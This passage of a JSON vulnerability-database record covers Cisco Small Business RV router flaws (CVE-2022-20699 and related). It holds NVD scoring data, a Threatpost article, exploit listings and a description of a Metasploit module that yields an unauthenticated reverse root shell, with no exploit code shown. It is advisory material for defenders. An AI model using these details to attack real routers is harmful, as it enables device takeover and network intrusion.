"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20708"], "modified": "2022-03-29T16:08:00", "cpe": ["cpe:/o:cisco:rv340_firmware:1.0.03.24", "cpe:/o:cisco:rv345_firmware:1.0.03.24", "cpe:/o:cisco:rv345p_firmware:1.0.03.24", "cpe:/o:cisco:rv340w_firmware:1.0.03.24"], "id": "CVE-2022-20708", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-20708", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv340_firmware:1.0.03.24:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv345p_firmware:1.0.03.24:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv340w_firmware:1.0.03.24:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv345_firmware:1.0.03.24:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:04:51", "description": "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.4, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-10T18:15:00", "type": "cve", "title": "CVE-2022-20703", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20703"], "modified": "2022-03-29T16:06:00", "cpe": ["cpe:/o:cisco:rv345_firmware:1.0.03.24", "cpe:/o:cisco:rv160w_firmware:1.0.01.05", "cpe:/o:cisco:rv160_firmware:1.0.01.05", "cpe:/o:cisco:rv260p_firmware:1.0.01.05", "cpe:/o:cisco:rv340_firmware:1.0.03.24", "cpe:/o:cisco:rv260w_firmware:1.0.01.05", "cpe:/o:cisco:rv340w_firmware:1.0.03.24", "cpe:/o:cisco:rv345p_firmware:1.0.03.24", "cpe:/o:cisco:rv260_firmware:1.0.01.05"], "id": "CVE-2022-20703", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-20703", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv345p_firmware:1.0.03.24:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv340w_firmware:1.0.03.24:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv260_firmware:1.0.01.05:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv160w_firmware:1.0.01.05:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv260p_firmware:1.0.01.05:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv160_firmware:1.0.01.05:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv345_firmware:1.0.03.24:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv340_firmware:1.0.03.24:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv260w_firmware:1.0.01.05:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:04:52", "description": "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-10T18:15:00", "type": "cve", "title": "CVE-2022-20701", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20701"], "modified": "2022-03-23T20:40:00", "cpe": ["cpe:/o:cisco:rv340_firmware:1.0.03.24", "cpe:/o:cisco:rv345_firmware:1.0.03.24", "cpe:/o:cisco:rv345p_firmware:1.0.03.24", "cpe:/o:cisco:rv340w_firmware:1.0.03.24"], "id": "CVE-2022-20701", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-20701", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv340_firmware:1.0.03.24:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv345p_firmware:1.0.03.24:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv340w_firmware:1.0.03.24:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv345_firmware:1.0.03.24:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:04:50", "description": "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-10T18:15:00", "type": "cve", "title": "CVE-2022-20700", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20700"], "modified": "2022-02-17T17:31:00", "cpe": ["cpe:/o:cisco:rv345_firmware:1.0.03.24", "cpe:/o:cisco:rv160w_firmware:1.0.01.05", "cpe:/o:cisco:rv160_firmware:1.0.01.05", "cpe:/o:cisco:rv260p_firmware:1.0.01.05", "cpe:/o:cisco:rv340_firmware:1.0.03.24", "cpe:/o:cisco:rv260w_firmware:1.0.01.05", "cpe:/o:cisco:rv340w_firmware:1.0.03.24", "cpe:/o:cisco:rv345p_firmware:1.0.03.24", "cpe:/o:cisco:rv260_firmware:1.0.01.05"], "id": "CVE-2022-20700", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-20700", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv345p_firmware:1.0.03.24:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv340w_firmware:1.0.03.24:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv260_firmware:1.0.01.05:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv160w_firmware:1.0.01.05:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv260p_firmware:1.0.01.05:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv160_firmware:1.0.01.05:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv345_firmware:1.0.03.24:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv340_firmware:1.0.03.24:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv260w_firmware:1.0.01.05:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:04:50", "description": "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-10T18:15:00", "type": "cve", "title": "CVE-2022-20699", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20699"], "modified": "2022-05-12T19:36:00", "cpe": ["cpe:/o:cisco:rv340_firmware:1.0.03.24", "cpe:/o:cisco:rv345_firmware:1.0.03.24", "cpe:/o:cisco:rv345p_firmware:1.0.03.24", "cpe:/o:cisco:rv340w_firmware:1.0.03.24"], "id": "CVE-2022-20699", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-20699", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv340_firmware:1.0.03.24:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv345p_firmware:1.0.03.24:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv340w_firmware:1.0.03.24:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv345_firmware:1.0.03.24:*:*:*:*:*:*:*"]}], "threatpost": [{"lastseen": "2022-02-10T00:00:00", "description": "UPDATE\n\nCritical security vulnerabilities in Cisco\u2019s Small Business RV Series routers could allow privilege escalation, remote code execution (RCE) with root privileges on the devices and more.\n\nThe RV series is a set of affordable VPN appliances that enable remote workers to connect to a company network. They come with built-in firewalls, advanced encryption and authentication features.\n\nThe critical bugs are part of 15 total vulnerabilities affecting the RV product line that Cisco disclosed this week. Some of the issues are exploitable on their own, while others must be chained together, the networking giant said \u2013 but they all could lead to a concerning cornucopia of bad outcomes. Some of these remain unpatched at the time of writing.\n\nAccording to Cisco\u2019s [Wednesday advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D>), attackers could exploit the bugs (which variously affect the RV160, RV260, RV340 and RV345 appliances) to do the following:\n\n * Execute arbitrary code\n * Elevate privileges\n * Execute arbitrary commands\n * Bypass authentication and authorization protections\n * Fetch and run unsigned software\n * Cause denial of service (DoS)\n\nCisco also said that proof-of-concept exploits are available for \u201cseveral of the vulnerabilities,\u201d but the company didn\u2019t offer details on any in-the-wild attacks.\n\nSome of the flaws only affect the RV340/RF345 line of Dual WAN Gigabit VPN routers, noted where applicable below. These affect version 1.0.03.24 and earlier and are patched in version 1.0.03.26.\n\nFor the RV160 and RV260 series, Cisco noted that versions 1.0.01.05 and earlier are affected. January\u2019s release of firmware version 1.0.01.07 addressed some of the issues, as detailed in the release notes ([PDF](<https://www.cisco.com/c/dam/en/us/td/docs/routers/csbr/RV260/Release_notes/RV16x_Rv26x_relnote_v1_0_01_07.pdf>)), but full patches are still forthcoming, the vendor confirmed to Threatpost. And unfortunately, in the meantime, no workarounds are available.\n\n\u201cCisco is working on fixes for the identified vulnerabilities for the RV160 and RV260 series routers as quickly as possible,\u201d a spokesperson said. \u201cOf the vulnerabilities identified in the advisory, five have fixes available today in release version 1.0.01.07. The remaining fixes will be released as soon as possible in February.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/03142427/Cisco-RV-e1643916286436.png>)\n\nSource: Cisco security advisory.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/03143256/Cisco-RV2.png>)\n\nSource: Cisco Release Notes for RV160, firmware version 1.0.01.07.\n\n## **Critical Cisco Bugs in RV Routers**\n\n### **Remote Code Execution**\n\nThe most concerning critical vulnerability rates 10 out of 10 on the CVSS vulnerability-severity scale. It arises in the SSL VPN module of Cisco Small Business RV340, RV340W, RV345 and RV345P Dual WAN Gigabit VPN routers. It could allow unauthenticated RCE, according to the advisory. At worst, device takeover would allow unfettered access to the business network on the part of an attacker.\n\n\u201cThis vulnerability is due to insufficient boundary checks when processing specific HTTP requests,\u201d the advisory reads. \u201cAn attacker could exploit this vulnerability by sending malicious HTTP requests to the affected device that is acting as an SSL VPN Gateway. A successful exploit could allow the attacker to execute code with root privileges on the affected device.\u201d\n\nThis one\u2019s of note, researchers said, because it exists in a favorite cybercrime target.\n\n\u201cWith the increase in usage of SSL VPNs over the last three years since the beginning of the pandemic, SSL VPNs are a favored attack vector for cybercriminals, as they recognize that organizations need to ensure access to internal resources for remote employees,\u201d Satnam Narang, staff research engineer at Tenable, said via email.\n\n### **Privilege-Escalation Vulnerabilities**\n\nThe flaws tracked as CVE-2022-20700, CVE-2022-20701 and CVE-2022-20702 meanwhile exist in the web-based management interface of Cisco Small Business RV Series Routers and could allow a remote attacker to elevate privileges to root.\n\nCVE-2022-20700 and CVE-2022-20701 both rate critical, with CVSS scores of 10 and 9, respectively, whileCVE-2022-20702 is rated medium-severity with a CVSS score of 6.\n\n\u201cThese vulnerabilities are due to insufficient authorization enforcement mechanisms,\u201d according to the advisory. \u201cAn attacker could exploit these vulnerabilities by submitting specific commands to an affected device. A successful exploit could allow the attacker to elevate privileges to root and execute arbitrary commands on the affected system.\u201d\n\n### **Running Unsigned Software**\n\nA critical bug tracked as CVE-2022-20703 (with a CVSS score of 9.3) is a vulnerability in the software image verification feature of the RV series that an unauthenticated, local adversary could exploit to install and boot a malicious software image or execute unsigned binaries.\n\n\u201cThis vulnerability is due to improper verification of software images as they are installed on an affected device. An attacker could exploit this vulnerability by loading unsigned software on the device,\u201d the advisory reads.\n\n### **Critical Command-Injection Bugs**\n\nThree bugs affecting the RV340, RV340W, RV345 and RV345P Dual WAN Gigabit VPN routers could allow an unauthenticated, remote attacker to inject and execute arbitrary commands on the underlying Linux operating system, Cisco warned.\n\nThe first, CVE-2022-20707, is critical and carries a CVSS rating of 10. CVE-2022-20708 and CVE-2022-20749 are both high-severity, with CVSS ratings of 7.3.\n\n\u201cThese vulnerabilities are due to insufficient validation of user-supplied input. An attacker could exploit these vulnerabilities by sending malicious input to an affected device,\u201d according to the advisory.\n\n## **Other Cisco Bugs in the RV Line**\n\nCisco also disclosed several high- and medium-severity vulnerabilities.\n\n### **High-Severity Command Injection**\n\nA vulnerability in the Open Plug and Play (PnP) module (CVE-2022-20706, CVSS score of 8.3) of the appliances could allow an unauthenticated, remote attacker to inject and execute arbitrary commands on the underlying Linux operating system, Cisco said.\n\n\u201cThis vulnerability is due to insufficient validation of user-supplied input,\u201d Cisco explained. \u201cAn attacker could exploit this vulnerability by sending malicious input to an affected device.\u201d\n\nOne caveat: A successful exploit requires the attacker to be in a man-in-the-middle (MitM) position or have control of a device connected to the vulnerable router.\n\n### **High-Severity Authentication-Bypass Bug**\n\nA high-severity vulnerability in the session management of the web interface for the RV appliances (CVE-2022-20705, CVSS score of 5.3) could be exploited by an unauthenticated, remote attacker to bypass authentication.\n\n\u201cA successful exploit could allow the attacker to take actions within the web UI with privileges up to the level of the administrative user and launch further attacks, exploiting the other vulnerabilities described in this advisory,\u201d according to Cisco. \u201cThe attacker could obtain partial administrative privileges and perform unauthorized actions.\u201d\n\nThe bug is due to \u201cweak entropy for session identifier generation functions,\u201d which a cyberattacker could exploit by brute-forcing a current session identifier, then reusing it to take over an ongoing session. Alternatively, an adversary could craft a new, valid session identifier and bypass the authentication mechanism entirely.\n\n### **High-Severity Arbitrary File Overwrite Bug**\n\nThe bug tracked as CVE-2022-20711 (with a CVSS score of 8.2) is found in the web interface of the RV340, RV340W, RV345 and RV345P Dual WAN Gigabit VPN routers. It could allow an unauthenticated, remote attacker to overwrite certain files on an affected device.\n\n\u201cThis vulnerability is due to insufficient input validation for specific components of the web UI,\u201d Cisco explained. \u201cAn attacker could exploit this vulnerability by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to overwrite existing files or exfiltrate confidential data by tampering with the files that are served by the web UI process.\u201d\n\n### **High-Severity RCE**\n\nA vulnerability in the upload module of the RV devices (CVE-2022-20712) could allow RCE as a non-root user. It rates 7.3 on the CVSS scale.\n\n\u201cThis vulnerability is due to insufficient boundary checks when processing specific HTTP requests,\u201d according to Cisco. \u201cAn attacker could exploit this vulnerability by sending malicious HTTP requests to an affected device.\u201d\n\n### **Medium-Severity MitM Exploit for Server Communications**\n\nThe CVE-2022-20704 bug (medium-severity, with a CVSS score of 4.8) in the software-upgrade module of the RV series could allow an unauthenticated, remote attacker to view or alter information being shared between an affected device and specific Cisco servers (cloudsso.cisco.com and api.cisco.com).\n\nIt\u2019s due to improper validation of the SSL server certificate that is received when establishing the server connections, according to the advisory.\n\n\u201cAn attacker could exploit this vulnerability by using man-in-the-middle techniques to intercept the traffic between the affected device and the server, and then using a forged certificate to impersonate the server,\u201d Cisco explained. \u201cA successful exploit could allow the attacker to force the affected device to download arbitrary software images and launch further attacks, combining other vulnerabilities.\u201d\n\n### **Medium-Severity Arbitrary File Upload Vulnerability**\n\nA vulnerability in the web-based management interface of Cisco RV340, RV340W, RV345 and RV345P Dual WAN Gigabit VPN Routers (CVE-2022-20709, with a CVSS rating of 5.3) could allow an unauthenticated, remote attacker to upload arbitrary files to an affected device.\n\n\u201cThis vulnerability is due to insufficient authorization enforcement mechanisms in the context of file uploads,\u201d according to Cisco. \u201cAn attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device.\u201d\n\n### **Medium-Severity DoS Bug**\n\nA vulnerability in the internal interprocess communication of the RV line (CVE-2022-20710, with a CVSS score of 5.3) could allow DoS attacks from an unauthenticated, remote attacker.\n\nThe issue specifically affects the log-in functionality of the web-based management interface for the appliances, which \u201cerroneously handled exceptions during failed login attempts,\u201d according to Cisco.\n\n\u201cAn attacker could exploit this vulnerability by submitting a crafted HTTP packet to an affected device,\u201d the advisory reads. \u201cA successful exploit could allow the attacker to prevent users from logging in to the affected device. Successful exploitation of this vulnerability would not impact users who are already logged in.\u201d\n\n**This posting was updated on Feb. 4 at 1 p.m. ET to include a statement from Cisco confirming that some of the bugs are unpatched.**\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-03T20:15:54", "type": "threatpost", "title": "Critical Cisco Bugs Open VPN Routers to Cyberattacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-20700", "CVE-2022-20701", "CVE-2022-20702", "CVE-2022-20703", "CVE-2022-20704", "CVE-2022-20705", "CVE-2022-20706", "CVE-2022-20707", "CVE-2022-20708", "CVE-2022-20709", "CVE-2022-20710", "CVE-2022-20711", "CVE-2022-20712", "CVE-2022-20749"], "modified": "2022-02-03T20:15:54", "id": "THREATPOST:A07707C9B30B86A691C1A24C4DC65EE6", "href": "https://threatpost.com/critical-cisco-bugs-vpn-routers-cyberattacks/178199/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-11-05T17:56:44", "description": "# CVE-2022-20699 \ud83c\udfa7\n## Br...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-14T06:23:06", "type": "githubexploit", "title": "Exploit for Out-of-bounds Write in Cisco Rv340 Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20699"], "modified": "2022-11-05T15:57:52", "id": "26AFA65D-4E78-506D-A1E9-336FBDA926A1", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-17T20:32:04", "description": "# CVE-2022-20699 \ud83c\udfa7\n## Br...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-10T14:40:25", "type": "githubexploit", "title": "Exploit for Out-of-bounds Write in Cisco Rv340 Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20699"], "modified": "2022-02-10T14:40:40", "id": "A97B12FD-207B-59C7-9E79-80106F63D735", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-03-14T15:32:36", "description": "# CVE-2022-20699 \ud83c\udfa7\n## Br...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-07T15:53:21", "type": "githubexploit", "title": "Exploit for Out-of-bounds Write in Cisco Rv340 Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20699"], "modified": "2023-03-14T15:09:16", "id": "2B4DA5E1-C2B9-5F0A-AFF5-D1C6D45FA38C", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "checkpoint_advisories": [{"lastseen": "2022-05-02T18:11:19", "description": "A denial of service vulnerability exists in Cisco Small Business RV Series Routers. Successful exploitation of this vulnerability would allow remote attackers to cause denial of service on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-02T00:00:00", "type": "checkpoint_advisories", "title": "Cisco Small Business RV Series Routers Denial Of Service (CVE-2022-20699)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20699"], "modified": "2022-05-02T00:00:00", "id": "CPAI-2022-0108", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2023-03-14T00:23:26", "description": "This Metasploit module exploits a stack buffer overflow in the Cisco RV series router's SSL VPN functionality. The default SSL VPN configuration is exploitable, with no authentication required and works over the Internet! The stack is executable and no ASLR is in place, which makes exploitation easier. Successful execution of this module results in a reverse root shell. A custom payload is used as Metasploit does not have ARMLE null free shellcode. This vulnerability was presented by the Flashback Team in Pwn2Own Austin 2021 and OffensiveCon 2022. For more information check the referenced advisory. This module has been tested in firmware versions 1.0.03.15 and above and works with around 65% reliability. The service restarts automatically so you can keep trying until you pwn it. Only the RV340 router was tested, but other RV series routers should work out of the box.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, 